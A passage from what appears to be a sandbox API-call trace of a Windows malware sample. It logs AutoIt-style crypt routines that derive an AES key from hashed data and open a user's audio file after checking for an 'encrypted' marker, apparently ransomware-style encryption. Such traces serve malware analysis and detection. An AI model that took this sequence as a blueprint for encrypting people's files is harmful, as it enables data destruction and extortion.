lpString2="encrypted", cchCount2=9) returned 1 [0038.502] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="srf0kc.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.502] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rf0kc.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.502] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f0kc.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.502] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0038.502] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0038.502] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0038.502] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0038.502] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0038.502] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="av", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0038.502] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wav", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0038.502] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".wav", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0038.502] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0038.502] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0038.502] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0038.503] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0038.503] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.503] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\vW-6Csrf0kc.wav", lpFindFileData=0x6ae7b8 | out: lpFindFileData=0x6ae7b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x861d3e90, ftCreationTime.dwHighDateTime=0x1d5c122, ftLastAccessTime.dwLowDateTime=0xdfd494b0, ftLastAccessTime.dwHighDateTime=0x1d5c564, ftLastWriteTime.dwLowDateTime=0xdfd494b0, ftLastWriteTime.dwHighDateTime=0x1d5c564, nFileSizeHigh=0x0, nFileSizeLow=0x1719c, dwReserved0=0x6ae908, dwReserved1=0x777648, cFileName="vW-6Csrf0kc.wav", cAlternateFileName="VW-6CS~1.WAV")) returned 0x7c2100 [0038.503] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0038.503] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.503] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0038.503] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0038.503] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0038.503] PeekMessageW (in: lpMsg=0x6ae6f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6f4) returned 0 [0038.503] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0038.503] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x754b0000 [0038.503] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0038.503] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0038.504] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0038.504] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0038.504] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0038.504] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0038.504] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0038.504] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0038.504] PeekMessageW (in: lpMsg=0x6ae4c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae4c4) returned 0 [0038.504] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0038.504] CryptAcquireContextA (in: phProv=0x6ae498, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6ae498*=0x7d5bb8) returned 1 [0038.505] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0038.505] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0038.505] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0038.505] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0038.505] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0038.505] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0038.505] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0038.505] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0038.505] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0038.505] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0038.505] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0038.505] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0038.505] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.505] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.506] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.506] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0038.506] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.506] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.506] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0038.506] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0038.506] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0038.506] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0038.506] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0038.506] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0038.506] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0038.506] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0038.506] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0038.506] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0038.506] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.506] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.506] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0038.506] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0038.506] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0038.506] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0038.507] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0038.507] CryptCreateHash (in: hProv=0x7d5bb8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x6ae208 | out: phHash=0x6ae208) returned 1 [0038.507] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.507] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.507] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.507] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.507] CharLowerBuffW (in: lpsz="byte[256]", cchLength=0x9 | out: lpsz="byte[256]") returned 0x9 [0038.507] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.519] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.519] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0038.519] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0038.519] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0038.519] CryptHashData (hHash=0x7c2240, pbData=0x7c95d0, dwDataLen=0x100, dwFlags=0x1) returned 1 [0038.519] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.519] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.519] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.519] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0038.519] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0038.519] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0038.519] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0038.519] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0038.519] CryptDeriveKey (in: hProv=0x7d5bb8, Algid=0x660e, hBaseData=0x7c2240, dwFlags=0x1, phKey=0x6ae208 | out: phKey=0x6ae208*=0x7c2280) returned 1 [0038.519] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.519] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.519] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.520] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.520] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.520] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0038.520] PeekMessageW (in: lpMsg=0x6ae344, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae344) returned 0 [0038.520] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0038.520] CryptDestroyHash (hHash=0x7c2240) returned 1 [0038.520] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.520] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.520] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.520] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.520] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.520] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\vW-6Csrf0kc.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vw-6csrf0kc.wav"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0038.520] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0038.520] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae940 | out: lpNewFilePointer=0x0) returned 1 [0038.520] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1850 [0038.520] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd00 [0038.520] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0038.520] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0038.520] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0038.520] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0038.520] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1698 | out: hHeap=0x770000) returned 1 [0038.521] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0038.521] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.521] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da348 [0038.521] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b87d0 [0038.521] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0038.521] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b87d0 | out: hHeap=0x770000) returned 1 [0038.521] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0038.521] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0038.521] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2240 [0038.521] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.521] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2240 | out: hHeap=0x770000) returned 1 [0038.521] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.521] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da348 [0038.521] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1698 [0038.521] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0038.521] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0038.521] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0038.521] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0038.521] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0038.521] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0038.521] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da408 [0038.521] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0038.521] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0038.521] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0038.521] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0038.521] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0038.521] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0038.521] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0038.521] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da408 [0038.521] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7f0 [0038.521] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0038.521] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0038.521] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0038.522] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0038.522] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0038.522] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9b8 [0038.522] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2f8 [0038.522] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0038.522] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0038.522] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da378 [0038.522] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5c40 [0038.522] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0038.522] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x50) returned 0x7f3630 [0038.522] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0038.522] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x50) returned 0x7f36e0 [0038.522] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5c40 | out: hHeap=0x770000) returned 1 [0038.522] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0038.522] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9b8 | out: hHeap=0x770000) returned 1 [0038.522] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2f8 | out: hHeap=0x770000) returned 1 [0038.522] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0038.522] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0038.522] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f3630 | out: hHeap=0x770000) returned 1 [0038.522] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0038.522] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7f0 | out: hHeap=0x770000) returned 1 [0038.522] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0038.522] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0038.522] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x50) returned 0x7f3630 [0038.522] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music")) returned 0x11 [0038.522] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f3630 | out: hHeap=0x770000) returned 1 [0038.522] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0038.522] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f36e0 | out: hHeap=0x770000) returned 1 [0038.522] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0038.522] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0038.523] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0038.547] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2240 [0038.547] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0xab0010 [0038.547] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0038.547] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0038.547] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS 